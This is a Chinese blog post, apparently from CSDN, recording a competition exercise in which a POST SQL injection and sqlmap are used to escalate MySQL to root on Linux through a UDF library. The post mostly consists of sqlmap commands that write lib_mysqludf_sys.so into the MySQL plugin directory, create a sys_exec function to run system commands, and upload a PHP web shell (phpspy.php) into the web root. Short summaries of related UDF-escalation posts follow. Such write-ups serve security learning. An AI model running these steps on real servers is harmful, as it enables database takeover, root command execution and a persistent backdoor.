Linux MySQL Udf 提权

最新推荐文章于 2025-04-23 01:41:01 发布
最新推荐文章于 2025-04-23 01:41:01 发布
阅读量2.3k 收藏 4
点赞数
CC 4.0 BY-SA版权
分类专栏: 其他相关 逆向漏洞 web安全 文章标签: liuxn Udf提权 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/kclax/article/details/91515105
本文详细记录了在一次竞赛中利用SQL注入漏洞,通过上传lib_mysqludf_sys插件并激活sys_exec函数,成功在Linux环境下实现MySQL提权至root的过程,同时展示了如何上传后门程序。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述
前几天做一个小竞赛中有一个题目:给定的测试环境登录页面有POST注入漏洞,于是果断操起sqlmap跑数 据,无意中发现当前MySQL连接用户为root,于是想到udf提权「虽然Windows下MySQL提权基本上没问题,但是Linux环境下原来一直 没成功过。」,最终成功获取root权限「主要问题在于MySQL是以root权限运行」,记录笔记如下,方便以后查阅:
具体步骤如下

找到MySQL插件目录:

python sqlmap.py -u 'http://xxxx' --sql-shell

show variables like "%plugin%";

利用sqlmap上传 lib_mysqludf_sys到MySQL插件目录;

python sqlmap.py -u 'http://xxxx' --file-write=/lib_mysqludf_sys.so 
--file-dest=/usr/lib/mysql/plugin/

激活存储过程「sys_exec」函数:

python sqlmap.py -u 'http://xxxx' --sql-shell

CREATE FUNCTION sys_exec RETURNS STRING SONAME lib_mysqludf_sys.so

SELECT * FROM information_schema.routines

sys_exec(id);

也利用sqlmap上传后门程序:

python sqlmap.py -u 'http://xxx'  --file-write=C:/phpspy.php --file-dest=/var/www/spy.php

测试环境

Linux Ubuntu 11.04 (Natty Narwhal)
PHP 5.3.5, Apache 2.2.17
MySQL 5.0

linux mysql udf
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
10-30 1077
创建自定义函数STRING | INTEGER } SONAME '文件名';[]是可选项[AGGREATE]是聚集函数的表示,系统定义的聚集函数比如有COUNT()、AVE()、MN()、MAX()、SUM(){STRING|INTEGER|REAL} 是返回的类型 字符串,整型SONAME 'file'表示这个函数从哪个文件里面引入,而这个文件一般是动态链接库windows下是dll,linux是so,并且这个文件要在mysql的plugin目录下。
Windows与LinuxMYSQL UDF分析
m0_57221101的博客
04-03 966
原理分析 什么是UDF 所谓UDF 就是user define function的简称,就是用户自定义函数,用户可以添加函数到mysql中实现功能的扩充,调用方法和一般函数一样类似于database(),但这一功能也导致了自定义函数中可能包含了恶意函数(系统命令),然后恶意的指令被以更高的限执行后,实现的手段。 一般无论是库站分离的服务器,还是库站在一台服务器的情况,我们都是先拿下www的限之后才有机会接触到数据库连接,毕竟没有多少人会真的打开3306端口把数据库对公,因此我们获得一个数据库的
linux环境下的MySQL UDF
黑战士的博客
04-25 2393
#1. 背景介绍###UDF(user defined function)用户自定义函数,是MySQL的一个扩展接口,称为用户自定义函数,是用来拓展MySQL的技术手段,用户通过自定义函数来实现在MySQL中无法实现的功能。文件后缀为.dll或.so,常用c语言编写。拿到一个WebShell之后,在利用操作系统本身存在的漏洞的时候发现补丁全部被修补。这个时候需要利用第三方应用。当MYSQL限比较高的时候我们就可以利用udf。###利用前mysqlfuncfunc。
linux——Mysql UDF
qq_55202378的博客
04-12 980
UDF:user define fucntion,在mysql中,允许用户创建自定义函数,这些函数可以在SQL查询语句中使用,通过使用UDF,用户可以对数据库执行自定义操作。:生成位置无关代码,PIC(Position independent code),这种代码可以在内存中的任何位置执行,简单查看该EXP,在利用过程中,需要登陆到mysql数据库,新建表,在表中插入编译好的共享库,gcc编译的时候,不指定相关参数,直接接源文件,可能会有各种各样的报错。:仅仅编译源代码,不进行链接,通常生成.o文件。
MysqlUDF
最新发布
lza20001103的博客
04-23 517
MysqlUDF
UDFlinux
m0_66299232的博客
05-23 1869
secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下,此时也无法。大概就是将程序进行gcc编译,然后再登录mysql进行创建一个表,插入.so文件,创建自定义函数进行越操作。#secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法。#secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可
mysql udf_mysql——udf
weixin_39958025的博客
12-05 196
01前言udf = ‘user defined function‘,即‘用户自定义函数’。文件后缀为‘.dll’,常用c语言编写。通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令。将MYSQL账号root转化为系统system限。02思路1.将udf文件上传到指定位置sqlmap中有现成的udf文件,有linux版本和windows版本分为32位和64位,...
Linux利用UDF库实现Mysql
09-10
4. **获取UDF库文件**:找到适用于当前操作系统(这里是Linux 64位)的UDF库文件,例如`lib_mysqludf_sys.so`。此文件可以在一些安全测试工具如sqlmap的资源中找到。 5. **加载UDF库**:将库文件的十六进制表示写入...
MySQLUDF
2301_76227305的博客
06-08 2951
udf 全称为'user defined function',意思是'用户自定义函数'。用户可以对数据库所使用的函数进行一个扩展(windows利用dll文件,linux利用so文件),那么我们就可以利用这个特点,往MySQL里面添加一个可以执行系统命令的函数即可。udf本质就是通过添加自定义函数让MySQL能执行系统命令,仅此而已。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
MySQL UDF
xsh80144242的博客
01-08 791
UDF是用户编写的共享库(如.so或.dll文件),可以通过MySQL加载并在SQL语句中调用。这些函数通常是用C或C++编写,并通过特定的接口注册到MySQL中。
mysql方式linux_Linux的几种常用方式
weixin_32631729的博客
01-28 2028
本文转载自微信公众号「Bypass」,作者Bypass 。转载本文请联系Bypass公众号。在渗透测试过程中,限是非常关键的一步,攻击者往往可以通过利用内核漏洞/限配置不当/root限运行的服务等方式寻找突破点,来达到限的目的。1、内核漏洞起内核漏洞就不得不到脏牛漏洞(Dirty Cow),是存在时间最长且影响范围最广的漏洞之一。低限用户可以利用该漏洞实现本地,...
渗透测试:数据库UDFlinux
qq_63442530的博客
04-01 2411
UDF:User Defined Function 用户自定义函数,MySQL数据库的初衷是用于方便用户进行自定义函数,方便查询一些复杂的数据,同时也有可能被攻击者利用,使用udf进行原理:攻击者通过编写,能调用cmd或者shell的共享库文件(window为.dll,linux为.so),并且导入到一个指定的文件夹目录下,在数据库中通过导入的共享库文件创建自定义函数,该自定义函数功能依照于共享库文件的功能,从而在数据库中调用该自定义函数能够使用系统命令。
linux mysql udf打包_Linux下的MySQL udf
weixin_35668158的博客
02-01 164
From:http://blog.chinaunix.net/uid-29141629-id-4383424.html写在前面:本文旨在通过透彻分析LinuxMySQLudf高大家的知识水平,以对这种类型的进行更好的防范,学了不要干违法的事情,否则后果自负。Linux操作系统自从诞生后,其高效的处理能力和卓越的稳定性受到广大用户的亲睐,特别是服务器市场,Linux占有很大的份额。...
Linuxmysql UDF
waxcj的博客
12-16 2457
linux mysql数据库
Linux精讲(二)Mysql udf
Hush78的博客
12-14 1202
其中需要特别注意的是 /usr/lib/mysql/plugin/raptor_udf2.so 文件的路径位置,因为不同版本号的数据库可能路径有不同的差别,因此需要我们特别查询进行文件构造。若secure_file_priv的值被设置为 /var/lib/mysql-files/,则表示只能在指定目录 /var/lib/mysql-files/ 下进行文件的操作。我们可以先利用searchsploite查询mysql udf可利用的文件,我们可以利用其中的 1518.c 文件作为的脚本。
linuxudf_LinuxMySQL UDF 小记
weixin_42356307的博客
01-14 302
实验环境:Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (x86_64) using readline 6.3可用POC:https://0xdeadbeef.info/exploits/raptor_udf2.chttps://www.exploit-db.com/exploits/1518/步骤:* $ id* uid=500(raptor)...
MySQLUDF
weixin_43774222的博客
03-14 733
一、getshell 1.arp扫描,发现靶机ip arp-scan -l 2.nmap扫描靶机开放端口信息 发现80端口开放 nmap -sS -sV 172.16.12.159 3.使用dirsearch扫描目录 发现vendor、WordPress等目录 dirsearch -u 172.16.12.159 4.访问vendor发现存在目录遍历漏洞 5.查看具体文件,信息收集 对文件进行查看,发现phpmailerautoload.php目录,以及reradme.md中存在phpmai
linuxudf_udf
weixin_34862561的博客
01-14 1149
0x00前言:udf是通过数据库来实现获取目标的管理员的shell,来达到从低到高限0x01什么是udfudf(Userdefined function)是用户自定义函数在mysql中函数是什么,比如mysql中常见的sleep(),sum(),ascii()等都是函数udf就是为了让我们开发者能够自己写方便自己函数,它有3种返回值,这三种分别是STRING,INTEGER,REA...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值